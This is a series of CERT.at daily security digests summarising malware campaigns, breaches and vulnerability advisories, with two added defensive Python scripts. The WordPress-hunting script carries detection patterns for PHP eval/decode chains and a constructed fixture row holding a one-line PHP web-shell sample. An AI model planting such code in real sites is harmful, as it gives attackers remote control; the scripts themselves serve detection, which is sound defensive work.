∗∗∗ Kubernetes Audit Log “Gotchas” ∗∗∗
---------------------------------------------
How to overcome challenges and security gaps when using K8s audit logs for forensics and attack detection.
---------------------------------------------
https://www.wiz.io/blog/overcoming-kubernetes-audit-log-challenges
∗∗∗ Massive npm Malware Campaign Leverages Ethereum Smart Contracts To Evade Detection and Maintain Control ∗∗∗
---------------------------------------------
Supply chain attacks are evolving. The Socket research team has uncovered a massive malware campaign that uses Ethereum smart contracts to control its operations - making it nearly impossible to shut down through traditional means. Instead of using conventional command and control servers that can be blocked or taken offline, these attackers ..
---------------------------------------------
https://socket.dev/blog/massive-npm-malware-campaign-leverages-ethereum-sma…
∗∗∗ PyPI Introduces Digital Attestations to Strengthen Python Package Security ∗∗∗
---------------------------------------------
The Python Package Index (PyPI) has announced support for digital attestations. This new feature allows package maintainers to publish signed digital attestations when uploading their projects, providing an additional layer of trust and verification for users. What Are Digital Attestations? Digital attestations are cryptographic statements or ..
---------------------------------------------
https://socket.dev/blog/pypi-introduces-digital-attestations
∗∗∗ 60 Hours of Cyber Defense: Hong Kong’s Innovative Cybersecurity Drill Begins ∗∗∗
---------------------------------------------
Hong Kong has initiated its first-ever cybersecurity drill, set to run for a total of 60 hours. The Hong Kong cybersecurity drill commenced on Friday, with plans to establish it as an annual event moving forward. Innovation minister Sun Dong emphasized the importance of this initiative, stating that maintaining cybersecurity is essential for ..
---------------------------------------------
https://thecyberexpress.com/hong-kong-cybersecurity-drill/
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical Laravel Flaw (CVE-2024-52301) Exposes Millions of Web Applications to Attack ∗∗∗
---------------------------------------------
https://securityonline.info/critical-laravel-flaw-cve-2024-52301-exposes-mi…
∗∗∗ [webapps] SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) ∗∗∗
---------------------------------------------
https://www.exploit-db.com/exploits/52082
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 13-11-2024 18:00 − Donnerstag 14-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575 ∗∗∗
---------------------------------------------
While the FortiJump patch does effectively neutralise the devastating RCE that is FortiJump, we’re still a little concerned about FortiManager’s overall code quality. We note that our som/export vulnerability, ‘FortiJump Higher’, is still functional, even in patched versions, allowing adversaries to elevate from one managed FortiGate appliance to the central FortiManager appliance.
---------------------------------------------
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-2311…
∗∗∗ New PXA Stealer targets government and education sectors for sensitive information ∗∗∗
---------------------------------------------
Cisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat actor targeting government and education entities in Europe and Asia.
---------------------------------------------
https://blog.talosintelligence.com/new-pxa-stealer/
∗∗∗ Advertisers are pushing ad and pop-up blockers using old tricks ∗∗∗
---------------------------------------------
A malvertising campaign using an old school trick was found pushing to different ad blockers. [..] In the olden days, that something extra used to be video codecs or specific video players, but now we’ll be told we need a browser extension to “continue watching in safe mode.” [..] To us, this looks like a campaign executed by an affiliate, a company that promotes products or services from another company. If someone buys something through the affiliate’s efforts, the affiliate earns a commission.
---------------------------------------------
https://www.malwarebytes.com/blog/news/2024/11/advertisers-are-pushing-ad-a…
∗∗∗ Crimeware and financial cyberthreats in 2025 ∗∗∗
---------------------------------------------
Kaspersky's GReAT looks back on the 2024 predictions about financial and crimeware threats, and explores potential cybercrime trends for 2025.
---------------------------------------------
https://securelist.com/ksb-financial-and-crimeware-predictions-2025/114565/
∗∗∗ Malware: evading detection with a bolted-on ZIP ∗∗∗
---------------------------------------------
IT researchers have discovered malware that evades detection by virus scanners by concatenating ZIP files.
---------------------------------------------
https://www.heise.de/-10034752
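The evasion relies on how ZIP readers work: the End Of Central Directory (EOCD) record is located by scanning backwards from the end of the file, so when a second archive is appended to a first one a standard parser only sees the trailing archive and never lists the members of the first. The following Python script is an added example (not code from the heise article or the researchers) that builds two small archives, glues them together and shows the discrepancy between what `zipfile` reports and what a linear walk over all local file headers finds; counting EOCD records is the cheap check a scanner can apply. The archive names and contents are constructed for the example.

```python
"""Detect concatenated ZIP archives (added example, not the article's code).

A ZIP reader locates the End Of Central Directory (EOCD) record from the end
of the file, so when two archives are glued together a standard parser sees
only the trailing one. Counting EOCD records and walking all local file
headers exposes the hidden archive. The sample archives below are constructed.
"""
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"   # local file header signature
EOCD_SIG = b"PK\x05\x06"    # end of central directory signature


def build_zip(name: str, data: bytes) -> bytes:
    """Build a one-member, uncompressed ZIP archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def find_eocd_offsets(blob: bytes) -> list[int]:
    """Return every offset at which an EOCD signature occurs."""
    offsets, pos = [], blob.find(EOCD_SIG)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(EOCD_SIG, pos + 1)
    return offsets


def walk_local_headers(blob: bytes) -> list[str]:
    """Walk local file headers front to back, crossing archive boundaries."""
    names, pos = [], 0
    while True:
        pos = blob.find(LOCAL_SIG, pos)
        if pos == -1 or pos + 30 > len(blob):
            break
        # version, flags, method, mtime, mdate, crc32, csize, usize, nlen, xlen
        (_, flags, _, _, _, _, csize, _, nlen, xlen) = struct.unpack(
            "<HHHHHIIIHH", blob[pos + 4:pos + 30])
        names.append(blob[pos + 30:pos + 30 + nlen].decode("utf-8", "replace"))
        # Skip header, name, extra field and the data when its size is in the header;
        # with a data descriptor (flag bit 3) csize is 0 and we resync on the next signature.
        pos += 30 + nlen + xlen + (0 if flags & 0x8 else csize)
    return names


def analyze(blob: bytes) -> dict:
    """Compare what a standard parser sees with what a full walk finds."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        standard_view = zf.namelist()
    eocd = find_eocd_offsets(blob)
    walked = walk_local_headers(blob)
    return {
        "eocd_records": len(eocd),
        "standard_parser_sees": standard_view,
        "all_local_headers": walked,
        "suspicious": len(eocd) > 1 or set(walked) != set(standard_view),
    }


# Constructed samples: a benign archive with a second archive appended to it.
BENIGN = build_zip("readme.txt", b"harmless text")
APPENDED = build_zip("payload.txt", b"second archive contents")
CONCATENATED = BENIGN + APPENDED

if __name__ == "__main__":
    for label, blob in (("single", BENIGN), ("concatenated", CONCATENATED)):
        print(label, analyze(blob))
```

On the concatenated blob `zipfile` lists only `payload.txt`, while the header walk lists both members and two EOCD records are found. Different unpackers resolve the ambiguity differently (some take the first archive, some the last), which is exactly what the evasion exploits, so a scanner should flag any file with more than one EOCD record rather than trust a single parser's view.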
∗∗∗ Free tool: security researchers crack ShrinkLocker encryption ∗∗∗
---------------------------------------------
The ShrinkLocker ransomware uses Microsoft's BitLocker to encrypt Windows systems. A decryption tool helps.
---------------------------------------------
https://www.heise.de/-10034933
∗∗∗ PHP Reinfector and Backdoor Malware Target WordPress Sites ∗∗∗
---------------------------------------------
We recently observed a surge in WordPress websites being infected by a sophisticated PHP reinfector and backdoor malware. While we initially believed that the infection was linked to the wpcode plugin, we found that several sites without this plugin were compromised as well. Upon deeper investigation, we discovered that this malware not only reinfects website files but also embeds malicious code into other plugins and database tables wp_posts and wp_options.
---------------------------------------------
https://blog.sucuri.net/2024/11/php-reinfector-and-backdoor-malware-target-…
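Because the reinfector described above also stores code in `wp_posts` and `wp_options`, cleaning files alone is not enough; the database has to be hunted too. The following Python script is an added example (not Sucuri's code) of that hunt: it applies a few indicator patterns (PHP open tags, eval/decode chains, remote script tags) to the two tables the write-up names. To run offline it uses an in-memory SQLite copy of the tables with constructed rows; the indicator patterns and sample values are my own, and on a real site the same queries would be pointed at the MySQL database.

```python
"""Hunt for injected PHP/JS in WordPress database tables (added example).

The Sucuri write-up notes the malware stores code in wp_posts and wp_options.
This script applies a few indicator patterns to those tables. It uses an
in-memory SQLite copy of the two tables with constructed rows so it runs
offline; against a real site, point the same queries at the MySQL database.
"""
import re
import sqlite3

# Indicators of injected code in content that should be plain text or HTML.
INDICATORS = {
    "php_tag": re.compile(r"<\?php", re.I),
    "php_eval_chain": re.compile(
        r"\b(eval|assert|base64_decode|gzinflate|gzuncompress|str_rot13|create_function)\s*\(",
        re.I),
    "remote_script": re.compile(r"<script[^>]*\bsrc=[\"']https?://", re.I),
}

# (table, key column, value column) for the tables the write-up names as infected.
TARGETS = [
    ("wp_options", "option_name", "option_value"),
    ("wp_posts", "ID", "post_content"),
]


def build_sample_db() -> sqlite3.Connection:
    """Constructed WordPress-like tables: two clean rows and two injected rows."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT, option_value TEXT);
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT);
    """)
    con.executemany("INSERT INTO wp_options (option_name, option_value) VALUES (?, ?)", [
        ("siteurl", "https://blog.example.invalid"),
        ("widget_text", "a:1:{i:0;s:52:\"<?php eval(base64_decode($_POST['k'])); ?>\";}"),
    ])
    con.executemany("INSERT INTO wp_posts (ID, post_title, post_content) VALUES (?, ?, ?)", [
        (1, "Hello", "<p>Welcome to the blog. We assert that all is well.</p>"),
        (2, "Pricing", "<p>Plans</p><script src=\"https://cdn.example.invalid/loader.js\"></script>"),
    ])
    con.commit()
    return con


def scan(con: sqlite3.Connection) -> list[tuple[str, str, str]]:
    """Return (table, row key, indicator) for every row matching an indicator."""
    hits = []
    for table, key_col, val_col in TARGETS:  # identifiers come only from the fixed list above
        for key, value in con.execute(f"SELECT {key_col}, {val_col} FROM {table}"):
            for name, pat in INDICATORS.items():
                if pat.search(value or ""):
                    hits.append((table, str(key), name))
                    break  # one indicator per row is enough to triage it
    return hits


if __name__ == "__main__":
    for hit in scan(build_sample_db()):
        print(hit)
```

The scan reports the serialized widget option carrying a PHP open tag and the post loading a script from an external host, and leaves the clean rows alone (the word "assert" in prose does not trigger the eval-chain pattern because it requires a following parenthesis). Any hit should be reviewed by hand before deletion, since legitimate plugins do store serialized data in `wp_options`.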
∗∗∗ Malware Spotlight: A Deep-Dive Analysis of WezRat ∗∗∗
---------------------------------------------
Check Point Research (CPR) provides a comprehensive analysis of a custom modular infostealer, tracked as WezRat, after the FBI, the US Department of Treasury, and the Israeli National Cybersecurity Directorate (INCD) released a joint Cybersecurity Advisory and attributed the malware to the Iranian cyber group Emennet Pasargad.
---------------------------------------------
https://research.checkpoint.com/2024/wezrat-malware-deep-dive/
∗∗∗ Lazarus Group Targets macOS with RustyAttr Trojan in Fake Job PDFs ∗∗∗
---------------------------------------------
Group-IB has uncovered Lazarus group’s stealthy new trojan and technique of hiding malicious code in extended attributes on macOS.
---------------------------------------------
https://hackread.com/lazarus-group-macos-rustyattr-trojan-fake-job-pdfs/
=====================
= Vulnerabilities =
=====================
∗∗∗ 4,000,000 WordPress Sites Using Really Simple Security Free and Pro Versions Affected by Critical Authentication Bypass Vulnerability ∗∗∗
---------------------------------------------
This is one of the more serious vulnerabilities that we have reported on in our 12 year history as a security provider for WordPress. This vulnerability affects Really Simple Security, formerly known as Really Simple SSL, installed on over 4 million websites, and allows an attacker to remotely gain full administrative access to a site running the plugin. CVE-2024-10924, CVSS Score: 9.8 (Critical)
---------------------------------------------
https://www.wordfence.com/blog/2024/11/really-simple-security-vulnerability/
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (llama-cpp, mingw-expat, python3.6, webkit2gtk4.0, and xorg-x11-server-Xwayland), Mageia (java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, java-21-openjdk & java-latest-openjdk and libarchive), Oracle (expat, gstreamer1-plugins-base, kernel, libsoup, podman, and tigervnc), SUSE (buildah, java-1_8_0-openjdk, and switchboard-plug-bluetooth), and Ubuntu (zlib).
---------------------------------------------
https://lwn.net/Articles/998143/
∗∗∗ CISA Releases Nineteen Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
Siemens, Rockwell, Hitachi, 2N, Elvaco, Baxter
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/11/14/cisa-releases-nineteen-i…
∗∗∗ GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7 ∗∗∗
---------------------------------------------
These versions contain important bug and security fixes, and we strongly recommend that all self-managed GitLab installations be upgraded to one of these versions immediately. [..] An issue was discovered in GitLab CE/EE affecting all versions starting from 16.0 prior to 17.3.7, starting from 17.4 prior to 17.4.4, and starting from 17.5 prior to 17.5.2, which could have allowed unauthorized access to the Kubernetes agent in a cluster under specific configurations. CVE-2024-9693, CVE-2024-7404, CVE-2024-8648, CVE-2024-8180, CVE-2024-10240
---------------------------------------------
https://thecyberthrone.in/2024/11/14/gitlab-fixes-high-severity-vulnerabili…
∗∗∗ Drupal: POST File - Critical - Cross Site Scripting, Arbitrary PHP code execution - SA-CONTRIB-2024-060 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-060
∗∗∗ Drupal: POST File - Moderately critical - Cross Site Request Forgery - SA-CONTRIB-2024-059 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-059
∗∗∗ Fortinet: Lack of capacity to filter logs by administrator access ∗∗∗
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-23-267
∗∗∗ Palo Alto: CVE-2024-2551 PAN-OS: Firewall Denial of Service (DoS) Using a Specially Crafted Packet (Severity: MEDIUM) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2024-2551
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 12-11-2024 18:00 − Mittwoch 13-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Itsmydata: hacker once again publishes credit score data of Jens Spahn ∗∗∗
---------------------------------------------
First via Bonify, now via Itsmydata: Lilith Wittmann has once again obtained credit score data on Jens Spahn. At least his score has improved.
---------------------------------------------
https://www.golem.de/news/itsmydata-hackerin-veroeffentlicht-erneut-bonitae…
∗∗∗ Threats in space (or rather, on Earth): internet-exposed GNSS receivers ∗∗∗
---------------------------------------------
Internet-exposed GNSS receivers pose a significant threat to sensitive operations. Kaspersky shares statistics on internet-exposed receivers for July 2024 and advice on how to protect against GNSS attacks.
---------------------------------------------
https://securelist.com/internet-exposed-gnss-receivers-in-2024/114548/
∗∗∗ China's Volt Typhoon crew and its botnet surge back with a vengeance ∗∗∗
---------------------------------------------
Ohm, for flux sake. China's Volt Typhoon crew and its botnet are back, compromising old Cisco routers once again to break into critical infrastructure networks and kick off cyberattacks, according to security researchers.
---------------------------------------------
https://www.theregister.com/2024/11/13/china_volt_typhoon_back/
∗∗∗ Electricity provider Tibber hacked, 50,000 German customers affected ∗∗∗
---------------------------------------------
Tibber confirms that hackers broke in and obtained customer data. The data is now being sold on the darknet.
---------------------------------------------
https://www.heise.de/news/Stromanbieter-Tibber-gehackt-50-000-deutsche-Kund…
∗∗∗ Security updates: Zoom Room Client & Co. vulnerable ∗∗∗
---------------------------------------------
The developers are hardening various Zoom apps against possible attacks. Among others, macOS and Windows are affected.
---------------------------------------------
https://www.heise.de/news/Sicherheitsupdates-Zoom-Room-Client-Co-angreifbar…
∗∗∗ Global Companies Are Unknowingly Paying North Koreans: Here’s How to Catch Them ∗∗∗
---------------------------------------------
We discuss North Korea's use of IT workers to infiltrate companies, detailing detection strategies like IT asset management and IP analysis to counter this.
---------------------------------------------
https://unit42.paloaltonetworks.com/north-korean-it-workers/
∗∗∗ The November 2024 Security Update Review ∗∗∗
---------------------------------------------
It’s not quite the holiday season, despite what some early decorators will have you believe. It is the second Tuesday of the month, and that means Adobe and Microsoft have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the ..
---------------------------------------------
https://www.thezdi.com/blog/2024/11/12/the-november-2024-security-update-re…
∗∗∗ How Italy became an unexpected spyware hub ∗∗∗
---------------------------------------------
Italy is home to six major spyware vendors and one supplier, with many smaller and harder-to-track enterprises emerging all the time, experts say.
---------------------------------------------
https://therecord.media/how-italy-became-an-unexpected-spyware-hub
∗∗∗ Germany warns of potential cyber threats from Russia ahead of snap election ∗∗∗
---------------------------------------------
“We must be especially prepared against threats like hacker attacks, manipulation, and disinformation," German Interior Minister Nancy Faeser said.
---------------------------------------------
https://therecord.media/germany-cyber-threats-russia-elections
∗∗∗ Silent Threat: Red Team Tool EDRSilencer Disrupting Endpoint Security Solutions ∗∗∗
---------------------------------------------
Trend Micro's Threat Hunting Team has observed EDRSilencer, a red team tool that threat actors are attempting to abuse for its ability to block EDR traffic and conceal malicious activity.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpo…
∗∗∗ Bitdefender Finds New ShrinkLocker Ransomware, Releases Its Decryptor Tool ∗∗∗
---------------------------------------------
Bitdefender has released a free decryptor for ShrinkLocker ransomware, which exploits Windows BitLocker to encrypt ..
---------------------------------------------
https://hackread.com/bitdefender-shrinklocker-ransomware-decryptor-tool/
∗∗∗ Emerging Threats: Cybersecurity Forecast 2025 ∗∗∗
---------------------------------------------
Every November, we start sharing forward-looking insights on threats and other cybersecurity topics to help organizations and defenders prepare for the year ahead. The Cybersecurity Forecast 2025 report, available today, plays a big role in helping us accomplish this mission. This year’s report draws on insights directly from Google ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-fore…
∗∗∗ Defending Your Directory: An Expert Guide to Fortifying Active Directory Certificate Services (ADCS) Against Exploitation ∗∗∗
---------------------------------------------
In our latest technical blog series, our DFIR team highlights the most prominent Active Directory (AD) threats, describes the tell-tale signs that your AD might be at risk, and gives experienced insight into the best prevention and mitigation strategies to shore up your AD security and bolster your digital identity protection.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper…
∗∗∗ Making Sense of Kubernetes Initial Access Vectors Part 1 – Control Plane ∗∗∗
---------------------------------------------
Explore Kubernetes control plane access vectors, risks, and security strategies to prevent unauthorized access and protect your clusters from potential threats.
---------------------------------------------
https://www.wiz.io/blog/making-sense-of-kubernetes-initial-access-vectors-p…
∗∗∗ Time Boxed Penetration Testing for Web Applications ∗∗∗
---------------------------------------------
This article defines time boxed penetration testing and explains how it’s approached from a methodological standpoint. By focusing on high-risk areas, client-specific priorities, and sampling, time boxed testing can deliver efficient assessments within a limited timeframe.
---------------------------------------------
https://projectblack.io/blog/time-boxed-penetration-testing/
∗∗∗ Killing Filecoin nodes ∗∗∗
---------------------------------------------
By Simone Monica. In January, we identified and reported a vulnerability in the Lotus and Venus clients of the Filecoin network that allowed an attacker to remotely crash a node and trigger a denial of service. This issue is ..
---------------------------------------------
https://blog.trailofbits.com/2024/11/13/killing-filecoin-nodes/
∗∗∗ Fault Injection – Down the Rabbit Hole ∗∗∗
---------------------------------------------
This series of articles describes fault injection attack techniques in order to understand their real potential by testing their limits and applicability with limited hardware (available on the market at an acceptable cost). It explores possible ways of using an attack that, in my opinion, is greatly underestimated.
---------------------------------------------
https://security.humanativaspa.it/fault-injection-down-the-rabbit-hole/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (expat), Fedora (chromium and golang-github-nvidia-container-toolkit), Mageia (curl, expat, mpg123, networkmanager-libreswan, openssl, php-tcpdf, qbittorrent, and x11-server, x11-server-xwayland, and tigervnc), Red Hat (kernel and libsoup), Slackware (mozilla), SUSE (firefox, kernel, python-PyPDF2, and xen), and Ubuntu (dotnet9, ghostscript, linux-aws, linux-oem-6.8, and pydantic).
---------------------------------------------
https://lwn.net/Articles/998044/
∗∗∗ ZDI-24-1472: Veeam Backup Enterprise Manager AuthorizeByVMwareSsoToken Improper Certificate Validation Authentication Bypass Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1472/
∗∗∗ ZDI-24-1486: (0Day) G DATA Total Security Incorrect Permission Assignment Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1486/
∗∗∗ Critical Security Vulnerabilities Discovered in MZ Automation’s MMS Client ∗∗∗
---------------------------------------------
https://encs.eu/news/critical-security-vulnerabilities-discovered-in-mz-aut…
∗∗∗ Online Installer DLL Hijacking ∗∗∗
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-24-205
∗∗∗ Fortinet Releases Security Updates for Multiple Products ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/11/12/fortinet-releases-securi…
=====================
= End-of-Day report =
=====================
Timeframe: Montag 11-11-2024 18:00 − Dienstag 12-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Data of Amazon employees published on a hacker forum ∗∗∗
---------------------------------------------
The data set likely originates from a property management company and traces back to the critical vulnerability in the MOVEit software
---------------------------------------------
https://www.derstandard.at/story/3000000244555/daten-von-amazon-mitarbeiter…
∗∗∗ ModeLeak: Privilege Escalation to LLM Model Exfiltration in Vertex AI ∗∗∗
---------------------------------------------
New research reveals two vulnerabilities in Google's Vertex AI that may lead to privilege escalation or data theft through custom jobs or malicious models.
---------------------------------------------
https://unit42.paloaltonetworks.com/privilege-escalation-llm-model-exfil-ve…
∗∗∗ 2023 Top Routinely Exploited Vulnerabilities ∗∗∗
---------------------------------------------
This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). Malicious cyber actors exploited more zero-day vulnerabilities to compromise ..
---------------------------------------------
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-317a
∗∗∗ Building a Resilient Network Architecture: Key Trends for 2025 ∗∗∗
---------------------------------------------
As organizations continue to align their operational strategies with evolving digital ecosystems and technologies, the concept of network resilience has become a priority. A major mindset shift is that modern networks must be designed not just for speed and efficiency but also for flexibility, security, and the ability to hold out against ..
---------------------------------------------
https://levelblue.com/blogs/security-essentials/building-a-resilient-networ…
∗∗∗ LodaRAT: Established malware, new victim patterns ∗∗∗
---------------------------------------------
Rapid7 has observed an ongoing malware campaign involving a new version of LodaRAT. This version possesses the ability to steal cookies and passwords from Microsoft Edge and Brave.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/11/12/lodarat-established-malware-new…
∗∗∗ ICS Security Is a Team Sport ∗∗∗
---------------------------------------------
Brandon Smith discusses some of the challenges an Automation Engineer faces, Bitsight's partnership with Schneider Electric, and what manufacturers in general are doing to tackle ICS security.
---------------------------------------------
https://www.bitsight.com/blog/ics-security-team-sport
∗∗∗ Visionaries Have Democratised Remote Network Access - Citrix Virtual Apps and Desktops (CVE Unknown) ∗∗∗
---------------------------------------------
Well, we’re back again, with yet another fresh-off-the-press bug chain (and associated Interactive Artifact Generator). This time, it’s in Citrix’s “Virtual Apps and Desktops” offering.
---------------------------------------------
https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-n…
∗∗∗ SAP Patch Day: Eight new security vulnerabilities, one of them high-risk ∗∗∗
---------------------------------------------
Admins can look at the current SAP Patch Day a little more relaxed: of eight new security vulnerabilities, only one is rated as high risk.
---------------------------------------------
https://heise.de/-10020168
∗∗∗ Attack of the Evil Baristas ∗∗∗
---------------------------------------------
I use the term “hacklore” to refer to the urban legends surrounding cybersecurity. Hacklore is everywhere, and this holiday season, you’re bound to hear it nonstop: “The Russians will load your phone with malware if you scan QR codes!” or “Hackers will steal your banking details if you use a USB charger at the airport!” and so on.
---------------------------------------------
https://medium.com/@boblord/attack-of-the-evil-baristas-b204436f0853
∗∗∗ Reverse Engineering: Finding Exploits in Video Games ∗∗∗
---------------------------------------------
In this guide, I'll walk you through how I create tools to find exploits in video games for bug bounty programs. Specifically, I'll focus on my research into the game Sword of Convallaria. This exploration is purely for educational purposes. As such, I have removed some of the assets as an exercise for ..
---------------------------------------------
https://shalzuth.com/Blog/FindingExploitsInGames
∗∗∗ Critical WPLMS WordPress Theme Vulnerability Puts Websites at Risk of RCE Attacks ∗∗∗
---------------------------------------------
A newly discovered vulnerability in the WPLMS WordPress theme threatens websites with potential Remote Code Execution (RCE) due to a critical path traversal flaw. CVE-2024-10470, a vulnerability in the WPLMS ..
---------------------------------------------
https://thecyberexpress.com/critical-wplms-wordpress-theme-vulnerability/
∗∗∗ Harnessing Chisel for Covert Operations: Unpacking a Multi-Stage PowerShell Campaign ∗∗∗
---------------------------------------------
The Cyble Research and Intelligence Lab (CRIL) has recently uncovered a sophisticated multi-stage infection chain, primarily driven by PowerShell scripts. This campaign, which targets organizations through a variety of ..
---------------------------------------------
https://thecyberexpress.com/new-powershell-campaign/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (gstreamer1-plugins-base), Debian (chromium, ghostscript, libarchive, mpg123, ruby-saml, and symfony), Fedora (buildah and podman), Red Hat (buildah, containernetworking-plugins, podman, skopeo, and xorg-x11-server-Xwayland), Slackware (wget), SUSE (pcp), and Ubuntu (linux, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-kvm, ..
---------------------------------------------
https://lwn.net/Articles/997903/
∗∗∗ Citrix Releases Security Updates for NetScaler and Citrix Session Recording ∗∗∗
---------------------------------------------
Citrix released security updates to address multiple vulnerabilities in NetScaler ADC, NetScaler Gateway, and Citrix Session Recording. A cyber threat actor could exploit some of these vulnerabilities to take control ..
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/11/12/citrix-releases-security…
∗∗∗ November Security Update ∗∗∗
---------------------------------------------
At Ivanti, our top priority is upholding our commitment to deliver and maintain secure products for our customers. Our vulnerability management program is designed to enable us to find, fix and disclose vulnerabilities in collaboration with the broader security ecosystem, and communicate responsibly and transparently with customers. Ivanti is ..
---------------------------------------------
https://www.ivanti.com/blog/november-2024-security-update
∗∗∗ XSA-464 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-464.html
∗∗∗ XSA-463 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-463.html
∗∗∗ Multiple vulnerabilities in Siemens Energy Omnivise T3000 ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/mehrere-schwachstelen…
∗∗∗ Zyxel security advisory for post-authentication command injection and buffer overflow vulnerabilities in GS1900 series switches ∗∗∗
---------------------------------------------
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Friday 08-11-2024 18:00 − Monday 11-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Palo Alto investigates possible security vulnerability in PAN-OS web interface ∗∗∗
---------------------------------------------
Palo Alto is investigating an alleged code injection vulnerability in the management interface of PAN-OS. Some affected customers are being notified. [..] Palo Alto urgently recommends that customers ensure that access to the management interface is configured correctly and in line with the recommended best-practice guidelines. The company also provides a guide for this.
---------------------------------------------
https://www.heise.de/-10013896.html
∗∗∗ Credentials from 2023 exploited for access - "Helldown Leaks" ransomware compromises companies via Zyxel firewalls ∗∗∗
---------------------------------------------
Since around the beginning of August 2024, companies worldwide have been encrypted by the ransomware group "Helldown Leaks". Zyxel firewalls can consistently be identified as the initial attack vector, even when they are running the latest software version.
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/11/zugangsdaten-aus-2023-fur-zugriff-…
∗∗∗ Testing the Koord2ool ∗∗∗
---------------------------------------------
As part of the EU-funded project “AWAKE”, we built the Koord2ool, which is a tool that allowed us to track the state of an incident across our constituency over time. We implemented this application as an extension to LimeSurvey (an Open Source survey tool) which generates a dashboard to visualize the state of the answers over time.
---------------------------------------------
https://www.cert.at/en/blog/2024/11/testing-the-koord2ool
∗∗∗ Cybercriminals Use Excel Exploit to Spread Fileless Remcos RAT Malware ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered a new phishing campaign that spreads a new fileless variant of known commercial malware called Remcos RAT. [..] The malicious Excel document is designed to exploit a known remote code execution flaw in Office (CVE-2017-0199, CVSS score: 7.8) to download an HTML Application (HTA) file ("cookienetbookinetcahce.hta") from a remote server ("192.3.220[.]22") and launch it using mshta.exe.
---------------------------------------------
https://thehackernews.com/2024/11/cybercriminals-use-excel-exploit-to.html
∗∗∗ #StopRansomware: Black Basta ∗∗∗
---------------------------------------------
Updates to this advisory, originally published May 10, 2024 [..] The advisory was updated to reflect new TTPs employed by Black Basta affiliates, as well as provide current IOCs/remove outdated IOCs for effective threat hunting.
---------------------------------------------
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a
∗∗∗ Cyberattack causes credit card readers to malfunction in Israel ∗∗∗
---------------------------------------------
As reported by the Jerusalem Post, the cause was a distributed denial-of-service attack (DDoS) that targeted the payment gateway company Hyp’s CreditGuard product. The attack disrupted communications between the card terminals and the wider payment system, but was not capable of stealing information or payments.
---------------------------------------------
https://therecord.media/cyberattack-causes-credit-card-readers-in-israel-to…
∗∗∗ Malware Steals Account Credentials ∗∗∗
---------------------------------------------
It’s common for malware to target e-commerce sites, and these attackers are usually seeking to steal credit card details. In most cases, they will insert scripts that extract data from the checkout forms to siphon fields like the cardholder name, card number and expiration date. [..] However, every now and then we encounter a case where in addition to that they are also looking to steal details for accounts that customers have created on these sites along with admin account credentials. We’ll explore one such case.
---------------------------------------------
